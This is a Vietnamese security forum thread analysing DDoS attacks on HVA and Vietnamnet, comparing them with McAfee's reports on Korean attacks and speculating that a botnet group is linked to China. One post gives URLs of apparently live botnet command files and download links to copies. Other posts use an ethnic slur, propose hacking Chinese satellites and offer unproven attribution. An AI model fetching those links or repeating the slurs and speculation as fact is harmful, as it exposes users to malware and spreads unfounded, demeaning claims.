Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?

@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

:) Đang tính bức xúc thì đọc trúng bài cuối của S3ll. Ai mấy khi mà không lỡ lời, huống chi khi say xỉn hay mệt mỏi sau 1 ngày lao động. :) Bài viết trong chủ đề này không những mang ý nghĩa kỹ thuật mà còn có nhiều bài học khác cho mình. Em không rành kĩ thuật nên có lướt qua những mảng chi tiết, em đang cố gắng khắc phục điều đó. Ngoài ra em theo dõi chủ đề này thường xuyên. Cảm ơn mọi người.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

thanks PXMMRF. Vẫn nhắc lại cho họ biết, trình độ IT của mình rất dở --> mình đã sai ở chỗ thiếu

Mình chỉ nói chính kiến. hihi sorry tất cả các member có thiện ý trong diễn đàn khi mình quá non trẻ. "thằng khựa nào không thích" nói thẳng mình, mình sẽ "lạy cho chết mẹ cả dòng họ phản quốc nó luôn". =)) PS: mình đang tìm mấy thằng đó ... member nào biết chỉ dùm. THANKU

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

mylove14129 wrote:

TQN wrote:

Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?
@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này.

Hàn quốc này cũng xung đột với triều tiên, chế độ cộng sản giống TQ. chắc cũng có liên quan thật :-S

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

phanledaivuong wrote:

mylove14129 wrote:

TQN wrote:

Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ?
@TQN : Giống nhau đến mức đáng phải suy nghĩ a. Nếu e nhớ không nhầm thì a PXMMRF đã từng nói nghi ngờ một tổ chức hacker nào đó( có lẽ là tổ chức có mạng lưới ở toàn cầu) là chủ nhân của những con Botnet này.
Hàn quốc này cũng xung đột với triều tiên, chế độ cộng sản giống TQ. chắc cũng có liên quan thật :-S

@ALL : nếu quả thật cuối cùng bọn STL này có liên quan ít nhiều đến Trung Quốc thì : anh PXMMRF < nhất định có được thông tin ngầm này ở một nơi nào đó. Hoặc vì lý do gì đó anh PXMMRF biết nhưng không thể, hoặc không tiện hoặc không dám nói thẳng ra ở HVA . vì tôi theo rõi các bước forensic của anh PXMMRF từ những phần đầu và thấy rằng anh PXMMRF luôn có "ý" về liên quan tới bọn tàu; chứ chỉ dựa vào các cách track back theo kỹ thuật đơn thuần thì quả thật rất khó có thể nói được có tầu tây gì tham gia hay không vào đám STL này; Thêm nữa yếu tố chính trị và Vietnamnet có liên quan gì đây ? Tôi đã từng hồ đồ mà suy diễn rằng "không có sự liên quan của Tàu khựa" nhưng giờ mới thấy mình ngây thơ. Quả thật chung kết, chung thời vận sắp đến rồi. Lòng người đen tối hơn . :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ? Chuyện tranh luận với bạn s3ll (sell), tôi không quan tâm. 10 người 11 ý. Không ai cấm ai suy nghĩ, phát biểu theo ý này ý kia được. Tôi cũng như bạn s3ll, lúc chiều đó uống sương sương mấy chai, tối lên mạng chửi bậy vài câu. Sáng ra tỉnh thì edit lại ngay. Tửu nhập ngôn xuất mà, phải không anh em :P

Theo anh, không loại bỏ khả năng stl sử dụng code và kỹ thuật của đám đã từng "phun mưa" ở Nam Hàn. Mô hình tương tự nhau, tiến trình cũng tương tự nhau, payload cũng được encrypt trên server side và decrypt ở client side, HTTP headers cũng mang tính chất random....

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nesbit — GMT

Cập nhật: Hôm nay mình scan thử bằng KIS 2011 thì thấy cả 6 files trong folder IAStore_26_08_2011 đều bị quét sạch.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Nowhereman wrote:

................................ @ALL : nếu quả thật cuối cùng bọn STL này có liên quan ít nhiều đến Trung Quốc thì : anh PXMMRF < nhất định có được thông tin ngầm này ở một nơi nào đó. Hoặc vì lý do gì đó anh PXMMRF biết nhưng không thể, hoặc không tiện hoặc không dám nói thẳng ra ở HVA . vì tôi theo rõi các bước forensic của anh PXMMRF từ những phần đầu và thấy rằng anh PXMMRF luôn có "ý" về liên quan tới bọn tàu; chứ chỉ dựa vào các cách track back theo kỹ thuật đơn thuần thì quả thật rất khó có thể nói được có tầu tây gì tham gia hay không vào đám STL này; Thêm nữa yếu tố chính trị và Vietnamnet có liên quan gì đây ? Tôi đã từng hồ đồ mà suy diễn rằng "không có sự liên quan của Tàu khựa" nhưng giờ mới thấy mình ngây thơ. Quả thật chung kết, chung thời vận sắp đến rồi. Lòng người đen tối hơn . :|

Vâng! Điều bạn đoán chắc là có. Nhưng đấy cũng chỉ là những xác minh lai sau này, để biết thật chắc chắn suy nghĩ của mình (của tôi) là đúng, hay ít nhất là có cơ sở thực tế, mà thôi. Chúng không phải là những thông tin mà tôi biết ngay từ đầu. Khi xét đoán, nhận định một sự kiện, cũng như danh tính, đông cơ (motivation) của những người can dự vào sự kiện ấy, phải đặt sự kiện vào bối cảnh, hoàn cảnh (situation) xã hôi, đất nước, thế giới cụ thể và đương thời của nó. Nếu không như vậy, thì rất khó xét đoán, nhận định sự kiện một cách đúng đắn hoặc sẽ có những suy nghĩ quá đơn giản, chỉ chuyên môn (kỹ thuật) đơn thuần, hay bị lệch hướng. Chúng ta cũng nên lưu ý, bối cảnh ở đây không chỉ liên quan đến chính trị. Những cuộc điều tra của McAfee về làn sóng tấn công DDoS vào nhiều website của Mỹ, Đại hàn và một vài nước khác thời gian gần đây, đã đươc công bố tại các địa chỉ sau: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems và đăc biệt là: http://blogs.mcafee.com/mcafee-labs/revealed-operation-shady-rat cũng là một phần quan trọng vẽ lên bối cảnh, hoàn cảnh nói trên một cách toàn diện. Không chỉ McAfee, các công ty bảo mật trên mạng khác, cũng có một số báo cáo điều tra với nội dung tương tự. Trong một sự kiện xảy ra có nhiều hiện tượng. Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy. Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy. Những hiện tượng riêng rẽ nói trên ta có thể tìm thấy không ít trong các bài viết của anh TQN, của tôi, của các bạn khác và ngay cả trong các bài viết của anh conmale, trong chủ đề này. Không chỉ vậy, việc xác định danh tính, động cơ của những người can dự vào sự kiện có nhiều trường hợp đòi hỏi phải theo dõi trong một thời gian đủ dài. Thí dụ tôi theo dõi sư kiện mà ta đang bàn trong chủ đề (topic) này, từ lúc PA Việt nam bị chiếm đoạt tên miền pavietnam.net, pavietnam.com, nghĩa là đã khá lâu, như tôi đã từng viết. Nhất thời rất khó xác định. Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ chúng ta biết về sự kiện TQ đã hoàn tất một dàn khoan lớn trị giá tới gần 1 tỷ USD, có thể hoạt động ở các vùng biển sâu tới 11.000m và khoan thăm dò tai vùng đáy biển sâu tới 3.000m, thì ta dễ choáng ngợp với tiềm năng kinh tế- kỹ thuật của TQ. Và có khi ta chỉ dừng suy nghĩ của mình tai điểm này. Nhưng nếu chúng ta tiếp tục suy nghĩ thì sẽ có nhiều câu hỏi được đặt ra cho chính mình. Chúng ta tư hỏi TQ đã mất bao nhiêu năm để làm xong cái dàn khoan thăm dò dầu khí khổng lồ này?. Thời gian thiết kế và chế tao chắc chỉ khoảng trên dưới 3 năm. Nhưng như vậy cũng là khá dài. Tuy nhiên ở các nước theo hệ thống quản lý XHCN thì thủ tục trình duyệt một dự án lớn như vậy vốn tốn rất nhiều thời gian. Từ khi các cấp lãnh đạo đưa ra ý tưởng ban đầu, rồi đến bước thiết lập dự án kinh tế-kỹ thuật khả thi, rồi trình các cấp lãnh đạo từ thấp đến cao nhất thông qua, góp ý, sửa đi sửa lai ... tốn ít nhất từ 3 đến 5 năm. Như vậy ta phải thấy TQ đã bắt đầu các bước chuẩn bị và tiến hành chế tao dàn khoan từ rất lâu rồi. Không phải chỉ thời gian mới đây. Câu hỏi tiếp theo là TQ sẽ đặt dàn khoan khủng ấy ở đâu trên biển Đông? Câu trả lời của những chuyên gia dầu khí am hiểu là: Nó cần phải đặt ở khu vực quần đảo Trường sa, gần khu vưc bãi Gac ma mà TQ đã chiếm của VN năm 1988. Khu vưc này là "rốn dầu" của biển Đông, có trữ lượng dầu khoảng trên dưới 200 tỷ barrel dầu thô, kèm theo một khối lượng khí khổng lồ, cỡ nhất nhì thế giới. Nền kinh tế phát triển nhanh và rất nóng của TQ tiêu thu một khối năng lương khổng lồ, trong đó chủ yếu là dầu. Hiện TQ chỉ có khả năng tự sản xuất và cung cấp khoảng 3 đến 4% nhu cầu dầu. Nếu nền công nghiệp của họ thiếu dầu cung cấp hay việc cung cấp bị gián đoạn thì nền kinh tế của TQ sẽ sụp đổ nhanh chóng kiểu "lá bài domino", chế độ và quyền lực của các cấp lãnh đạo cao nhất cũng sụp đổ theo. Vừa qua TQ đầu tư một khoản tín dụng khổng lồ vào các nước châu Phi, châu Mỹ Latinh để đổi lai các quyền lơi kinh tế, trong đó có việc đươc cung cấp dầu, nguyên liêu thô.. một cách ổn định. Tuy nhiên sự sụp đổ gần đây của chính quyền các nước châu Phi như Ai câp, Lybia... đã gây không ít khó khăn và tổn thất cho TQ. Sư cung cấp dầu đươc kỳ vọng là đầy đủ và liên tục từ các nước này trở thành sự thất vọng năng nề. Từ bối cảnh trên chúng ta hiểu rõ tai sao vừa qua TQ lai kiên quyết không đàm phán với VN về chủ quyền Hoang sa (thông tin công khai trên các báo TQ), kiên định lập trường về đường "lưỡi bò" chiếm hơn 80% diện tích biển Đông là "chủ quyền không thể bàn cãi" của TQ là lợi ích "cốt lõi" của quốc gia này. Câu hỏi tiếp theo nữa là dàn khoan khủng sẽ đươc đưa ra vị trí dự định và đứng một mình à? Không phải, nó phải đi kèm theo từ 3 đến 4 tầu lai, dắt. Xung quanh nó phải có các tầu tiếp tế, các chiến hạm, tầu ngầm bảo vệ nữa. Thế là một vương quốc nhỏ thuộc chủ quyền TQ sẽ được đặt tai khu vực quần đảo Trường sa. Câu hỏi cuối cùng, chắc không phải là cuối cùng đâu, là dàn khoan sẽ liên lạc thường xuyên với đất liền, với các chiến hạm bằng cách nào? Vị trí dự kiến đặt dàn khoan cách VN khoảng 400 km, cách luc đia TQ, điểm gần nhất, là xa gấp 3 lần, khoảng 1000-1200km. Với khoảng cách này không thể kéo cáp quang từ đất liền ra dàn khoan được. Như vậy việc liên hệ phải thông qua vệ tinh (satellite communication). Vậy thì TQ chống hack qua con đường vệ tinh thế nào nhỉ? TQ hiện có bao nhiêu vệ tinh và có vệ tinh địa tĩnh nào của TQ đặt ngay trên biển Đông không nhỉ? Cứ thế ta sẽ có hàng loạt câu hỏi về một sự kiên. Đặt ra và tìm cách trả lời chúng, ta có có thể nhận thức sâu sắc, chính xác về sự kiện.

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

@PXMMRF bài phân tích của bác rất hay, vote bác 1 phiếu Thế thì ta tập trung và hack vệ tinh của TQ cho chúng nó bít tay, hem bít là mấy bác chính phủ ta đã nhìn ra vấn đề chưa, và có cách nào đối phó ko, chứ mất trường sa đến nơi rồi

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Anh PXMMRF lúc nào phân tích củng hay có thể nói được tổng quan các vấn đề. mặc dù em ko xác minh được nó đúng được nhiều hay ít nhưng với em nó cực kì có giá trị Theo dõi topic này có nhiều cái rất thú vị Thanks các anh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Cái ông TMDTHBC đang coi rada thì tập trung vào coi đi, cứ lớ nhớ sang HVA làm gì, bọn khựa nó vác J10 - J15 ra đập nát hết mấy cái trạm rada bi giờ Tình hình qua các bài phân tích của các bác càng ngày càng sáng tỏ, bi giờ nghĩ cách gì để tránh các cú dập tiếp theo của khựa vào các website vietnam đây đau đầu thiệt, STL (Sờ Ti Lơn) nó là 1 tổ chức chặt chẽ và phân công công việc cho từng nhóm phát triển, thì ta có cách nào dập lại nó ko các bác, để chúng nó hoành hành mãi thế này, nản quá

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

thuypv wrote:

Cái ông TMDTHBC đang coi rada thì tập trung vào coi đi, cứ lớ nhớ sang HVA làm gì, bọn khựa nó vác J10 - J15 ra đập nát hết mấy cái trạm rada bi giờ Tình hình qua các bài phân tích của các bác càng ngày càng sáng tỏ, bi giờ nghĩ cách gì để tránh các cú dập tiếp theo của khựa vào các website vietnam đây đau đầu thiệt, STL (Sờ Ti Lơn) nó là 1 tổ chức chặt chẽ và phân công công việc cho từng nhóm phát triển, thì ta có cách nào dập lại nó ko các bác, để chúng nó hoành hành mãi thế này, nản quá

Hihi theo mấy sư huynh HVA học thêm mà, nếu được thì track = googlemap, rồi dựa theo đó mới cập nhật được tình hình thực tế bạn à. Vả lại việc HVA làm là điều tốt mà, người dân Việt Nam đều ủng hộ việc làm chính nghĩa của họ. Note: J10-J15 --> bullshit, 37 ly hay A72 là đủ xử đẹp rồi bạn, mô phỏng thì tốc độ Mach 2.25 nhưng bay cỡ đó thì chỉ có F22 hay Su35 mới tác chiến được. J10-15 bay đến cỡ đó thì ... =)) "bắn rồng nước" thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

canh_nguyen — GMT

Hôm nay bật thử cái monitor để compare thì thấy nội dung file http://wide.ircop.cn/index.txt?113 http://pref.firebay.cn/index.txt?113 đã thay đổi Up lên đây đề phòng nó change phát nữa : http://www.mediafire.com/?fiazi6a1jmyzmci http://www.mediafire.com/?zba22ipikm1fqzp

Phân tích tính chất vài trận DDoS HVA vừa qua.

hieutd — GMT

Mình đồng ý với ý kiến của bac PXMMRF. Mình thấy anh Conmale cực đoan khi cố tình gán ghép cho CS

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

@PXMMRF : cảm ơn anh đả chia sẽ về kinh nghiệm logic vấn đề cho mọi người, quả thật những cái nhìn bao quát và những sâu chuỗi các vấn đề Trung Quốc của anh rất có lí. tuy nhiên thật sự có một yếu tố khiến em vẫn chưa dám chắc và luôn tự đặt câu hỏi là tại sao và vì lý do gì bọn STL lại ...DDOS danlambao ?!?. và nếu muốn phá rối một hạ tầng IT của Việtnam thì chắc chắn HVA không phải là đích chuẩn rồi? @thuypv, TMDTHBC : các bác là học viên kỹ thuật quân sự phải không mà rành về rada, sung số , thiết bị định vị dẫn đường, viba số và khí tài quân sự thế. các bác nên nhớ rằng trừng nào vẫn phải dùng tiền ra mua tàu ngầm, súng đạn, tên lửa S300 rồi thì các loại khi tài quân sự khác thì các bác vẫn chưa thể gọi là " làm chủ các công nghệ " đó đâu. cho nên các bác cứ học tập và làm việc cho tốt để sử dụng lại các công nghệ của các nước văn minh, tiến bộ đó để bảo vệ bình yên đất việt là tốt rồi. các bác không phải mang thêm khoa học quân sự vô đây nữa nhé. thanks . @hieutd : bạn viết " Mình thấy anh Conmale cực đoan khi cố tình gán ghép cho CS" . a) thứ nhất : mình không thấy điều này ở anh Conmale, bởi mình khô có chứng cứ rõ ràng chô nào anh ấy " cố tình gán ghép" b) thứ hai : mình không thấy chô nào là cực đoan cả. bạn nên nhớ rằng, mọi ý tứ và suy luận của anh Conmale nói riêng và các anh khác nói chung ( những người đã lớn tuổi đời, và kinh nghiệm nhiều chuyện ) khi kết luận một điều gì đó hoặc bóng gió, thì chắc hẳn phải có cơ sở bạn ạ. thanks with regards.

Phân tích tính chất vài trận DDoS HVA vừa qua.

hvthang — GMT

Post /hvaonline/posts/list/900/39641.html#246798 của bác PXMMRF vẫn đang chỉ là một định hướng cho cách phân tích và nhìn nhận vấn đề theo cách thức phù hợp hơn chứ cũng chưa đưa ra được một dẫn chứng nào thuyết phục cho việc stl là ai cả. Cho tới giờ, mọi thông tin về stl đều chỉ dừng ở mức phỏng đoán và nếu vậy thì em vẫn nghiêng về phía những phỏng đoán dựa vào những dấu hiệu cụ thể (các phân tích kỹ thuật) hơn là cảm quan của một vài người, dù những người đó (bao gồm bác PXMMRF) thường có những nhìn nhận đúng trước đây. Các phân tích về dàn khoan của TQ của bác PXMMRF em vẫn chưa nhìn thấy giá trị trong việc nhận định stl, hơn nữa nó còn làm cho hướng nhận định stl dễ bị sa vào một hướng duy nhất.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

hieutd wrote:

Mình đồng ý với ý kiến của bac PXMMRF. Mình thấy anh Conmale cực đoan khi cố tình gán ghép cho CS

Bạn chắc là dưới 20 tuổi, vẫn chưa biết gì nhiều, vẫn còn tin vào Đảng và chính phủ :D. Bạn lớn thêm tí nữa, biết nhiều thông tin hơn bạn sẽ hiểu. Trước giờ những thông tin mà bạn đọc được từ báo chí trong nước, kiến thức học từ môn văn môn sử trong trường chỉ là những thông tin 1 chiều, chủ quan do chính phủ VN viết thôi bạn à. Phải chịu khó tìm hiểu, sáng suốt nhận xét thì mới phân biệt được đâu là thật đâu là giả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

Nowhereman wrote:

... nếu muốn phá rối một hạ tầng IT của Việtnam thì chắc chắn HVA không phải là đích chuẩn rồi? ...

Điểm này tôi có chút ý kiến. Đánh vào hạ tầng IT, không hẳn là đánh vào một Datacenter, một ISP hay một cái router nào đó cụ thể, vì còn người là còn khắc phục được, còn chống đỡ được, thậm chí phản công được. HVA hiện nay theo quan sát của tôi, là nơi "tụ họp" thông thường nhất của các chuyên gia kỹ thuật máy tính. Nếu một thế lực nào đó muốn phá hoại tận gốc nền IT của Việt Nam, thì họ phải ngăn cản các chuyên gia của ta gặp gỡ và thảo luận, làm chúng ta chia rẽ, nghi ngờ lẫn nhau. Đó có thể ( chỉ là phỏng đoán ) là lý do các thế lực này trong thời gian qua, đưa HVA vào danh sách tấn công, bôi nhọ và chia rẽ. Mặt khác, để có HVA như hôm nay, một tổ chức lớn có uy tín, có thâm niên kinh nghiệm, có lòng tin của anh chị em chuyên gia, không phải ngày một, ngày hai có thể gầy dựng được. Nói cách khác, với các thế lực muốn phá hoại hạ tầng IT của Việt Nam, triệt hạ HVA là một mục tiêu rất quan trọng, có khả năng gây thiệt hại đáng kể ( khó đo lường được ở hiện tại ) Ai cần bằng chứng, thì topic này chính là bằng chứng, các bài viết của anh TQN đã và đang làm điều mà các thế lực kia lo sợ khi HVA tồn tại. Tôi tin rằng, sau anh TQN, sẽ còn có nhiều TQN khác tiếp bước công việc chính nghĩa mà anh làm

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

hvthang wrote:

Post /hvaonline/posts/list/900/39641.html#246798 của bác PXMMRF vẫn đang chỉ là một định hướng cho cách phân tích và nhìn nhận vấn đề theo cách thức phù hợp hơn chứ cũng chưa đưa ra được một dẫn chứng nào thuyết phục cho việc stl là ai cả. ............................................

hvthang wrote:

Các phân tích về dàn khoan của TQ của bác PXMMRF em vẫn chưa nhìn thấy giá trị trong việc nhận định stl, hơn nữa nó còn làm cho hướng nhận định stl dễ bị sa vào một hướng duy nhất.

Phân tích về dàn khoan của tôi chỉ là một "Thí dụ" nhằm minh hoạ cho một quan điểm của tôi là:

PXMMRF wrote:

Cũng cần nói thêm là việc quan sát và biết về một bối cảnh, hoàn cảnh không đồng nghĩa với việc đã nhận thức nó một cách đúng đắn và sâu sắc. Thí dụ...

Vì vậy nó không liên quan gì đến STL hay chính xác hơn là tổ chức lãnh đạo (sai khiến) STL cả. Khi đọc các bài tôi viết, xin một số bạn chịu khó bỏ ra vài phút nghiền ngẫm. Không phải là "Nói Sơn Tây, chết cây Hà nội", mà có đôi chỗ, đôi câu là "Ý tại ngôn ngoại" đấy!

hvthang wrote:

Cho tới giờ, mọi thông tin về stl đều chỉ dừng ở mức phỏng đoán và nếu vậy thì em vẫn nghiêng về phía những phỏng đoán dựa vào những dấu hiệu cụ thể (các phân tích kỹ thuật) hơn là cảm quan của một vài người, dù những người đó (bao gồm bác PXMMRF) thường có những nhìn nhận đúng trước đây.

Thì các "dấu hiệu cụ thể (các phân tích kỹ thuật)" mà bạn viết chính là cái tôi gọi là các "hiện tượng" trong bài viết trên đây của tôi. Chỉ có điều tôi nói thêm là: "Nếu xét riêng từng hiện tượng, tách rời nó với các hiện tượng khác, chúng ta sẽ khó xác định hay tìm ra những mối liên quan với danh tính hay động cơ của những người can dự vào sự kiện. Nghĩa là chúng ta khó coi nó là một bằng chứng (evidence) tin cậy. Nhưng nếu chúng ta gôp chung chúng, tổng hơp chúng với nhau và đặt chúng trong một bối cảnh, hoàn cảnh cụ thể thì lai thấy những bằng chứng rất đáng tin cậy." Ngoài ra tôi còn đề nghị phải tìm hiểu, nhận xét bối cảnh, hoàn cảnh đó một cách toàn diện, chính xác và sâu sắc. -------------------------- Nhân đây tôi "bật mí" cho các bạn một thông tin. Trong bài viết đánh giá về tổ chức của STL (bao gồm chính bản thân STL và bộ phận lãnh đạo, hướng dẫn nó) trong topic này tôi có viết một câu:

PXMMRF ngay17/08/2011 luc 15:44:12 wrote:

Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ.

Bai viết tại: /hvaonline/posts/list/450/39641.html#245191 Thì nay xin tiết lộ, câu viết trên đây ám chỉ sự kiện sau: http://nhipsongso.tuoitre.vn/Nhip-song-so/455316/Tran-lan-web-mao-danh-lanh-dao.html Vào thời gian viết bài nói trên, tôi đã biết sư kiện này và đang tìm hiểu nó. Vì chưa tìm hiểu kỹ nên chưa thể thông báo. Nay báo NLĐ và Tuổi trẻ online đã thông báo sự kiện, nên không còn gì là bí mật nữa. Tuy nhiên thực tế nghiêm trong và kinh hãi hơn thông tin trên báo nhiều.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

xnohat wrote:

Nowhereman wrote:

... nếu muốn phá rối một hạ tầng IT của Việtnam thì chắc chắn HVA không phải là đích chuẩn rồi? ...
Điểm này tôi có chút ý kiến. Đánh vào hạ tầng IT, không hẳn là đánh vào một Datacenter, một ISP hay một cái router nào đó cụ thể, vì còn người là còn khắc phục được, còn chống đỡ được, thậm chí phản công được. HVA hiện nay theo quan sát của tôi, là nơi "tụ họp" thông thường nhất của các chuyên gia kỹ thuật máy tính. Nếu một thế lực nào đó muốn phá hoại tận gốc nền IT của Việt Nam, thì họ phải ngăn cản các chuyên gia của ta gặp gỡ và thảo luận, làm chúng ta chia rẽ, nghi ngờ lẫn nhau. Đó có thể ( chỉ là phỏng đoán ) là lý do các thế lực này trong thời gian qua, đưa HVA vào danh sách tấn công, bôi nhọ và chia rẽ. Mặt khác, để có HVA như hôm nay, một tổ chức lớn có uy tín, có thâm niên kinh nghiệm, có lòng tin của anh chị em chuyên gia, không phải ngày một, ngày hai có thể gầy dựng được. Nói cách khác, với các thế lực muốn phá hoại hạ tầng IT của Việt Nam, triệt hạ HVA là một mục tiêu rất quan trọng, có khả năng gây thiệt hại đáng kể ( khó đo lường được ở hiện tại ) Ai cần bằng chứng, thì topic này chính là bằng chứng, các bài viết của anh TQN đã và đang làm điều mà các thế lực kia lo sợ khi HVA tồn tại. Tôi tin rằng, sau anh TQN, sẽ còn có nhiều TQN khác tiếp bước công việc chính nghĩa mà anh làm

@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

Nowhereman wrote:

@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ?

Thực tế, sau khi a TQN tiến hành phân tích và bước đầu vạch mặt đám Botnet của stl thì hva mới bị ddos. Điều đó có nghĩa là mục tiêu ddos hva có thể chỉ là sự trả thù, không muốn thông tin (server,phương thức hoạt động, che giấu...) của mạng botnet của họ bị quá nhiều người, tổ chức biết đến vì khi có nhiều người biết đương nhiên các AV cũng sẽ vào cuộc. Đồng thời cũng có ý đồ cảnh cáo cho a TQN để a không tiếp tục RCE số vr này nữa( điều này a TQN đã viết trước đây). Vì vậy theo mình nguyên nhân của việc hva bị ddos có thể không liên quan nhiều lắm đến mục đích phá hoại hạ tầng IT của VN.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

mylove14129 wrote:

Nowhereman wrote:

